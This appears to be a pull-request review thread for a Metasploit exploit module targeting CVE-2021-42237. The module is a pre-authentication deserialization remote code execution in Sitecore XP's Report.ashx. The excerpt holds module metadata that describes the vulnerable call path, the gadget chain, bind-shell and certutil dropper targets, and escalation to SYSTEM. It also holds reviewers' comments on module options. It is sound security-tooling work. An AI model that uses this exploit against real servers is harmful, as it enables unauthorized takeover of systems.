modules/exploits/windows/http/cve_2021_42237.rb

```diff
@@ -0,0 +1,216 @@
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Powershell
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Sitecore Experience Platform (XP) PreAuth Deserialization RCE',
+        'Description' => %q{
+          This module exploits a deserialization vulnerability in the Report.ashx page
+          of Sitecore XP 7.5 to 7.5.2, 8.0 to 8.0.7, 8.1 to 8.1.3, and 8.2 to 8.2.7.
+          Versions 7.2.6 and earlier and 9.0 and later are not affected.
+
+          The vulnerability occurs due to Report.ashx's handler, located in Sitecore.Xdb.Client.dll
+          under the Sitecore.sitecore.shell.ClientBin.Reporting.Report defintion, having a ProcessRequest()
+          handler that calls ProcessReport() with the context of the attacker's request without properly
+          checking if the attacker is authenticated or not.
+
+          This request then causes ReportDataSerializer.DeserializeQuery() to be called, which will
+          end up calling the DeserializeParameters() function of
+          Sitecore.Analytics.Reporting.ReportDataSerializer, if a "parameters" XML tag is found in
+          the attacker's request.
+
+          Then for each subelement named "parameter", the code will check that it has a name and
+          if it does, it will call NetDataContractSerializer().ReadObject on it. NetDataContractSerializer is
+          vulnerable to deserialization attacks and can be trivially exploited by using the
+          TypeConfuseDelegate gadget chain.
+
+          By exploiting this vulnerability, an attacker can gain arbitrary code execution as the user
+          that IIS is running as, aka NT AUTHORITY\NETWORK SERVICE. Users can then use technique 4
+          of the "getsystem" command to use RPCSS impersonation and get SYSTEM level code execution.
+        },
+        'Author' => [
+          'AssetNote', # Discovery and exploit
+          'gwillcox-r7' # Module
+        ],
+        'References' => [
+          ['CVE', '2021-42237'],
+          ['URL', 'https://blog.assetnote.io/2021/11/02/sitecore-rce/'],
+          ['URL', 'https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776'],
+        ],
+        'DisclosureDate' => '2021-11-02',
+        'License' => MSF_LICENSE,
+        'Platform' => 'win',
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Windows Command',
+            {
+              'Arch' => ARCH_CMD,
+              'Type' => :win_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/powershell_bind_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Dropper',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :win_dropper,
+              'CmdStagerFlavor' => :certutil,
```

Comment:
Is this a limitation?

Reply:
This is likely left over from the module I based this off of. Happy to change this based on recommendations; this isn't a limitation of this exploit.

Reply:
It does limit your selection.

Reply:
Sounds good, I'll drop this in the next commit when I also remove the Privileged flag and set it to False.

Reply:
Removed the CmdStagerFlavor option being set in https://github.com/rapid7/metasploit-framework/pull/15858/commits/be4fa90f1aab0ef38ab1ca21cd02754be6940a5c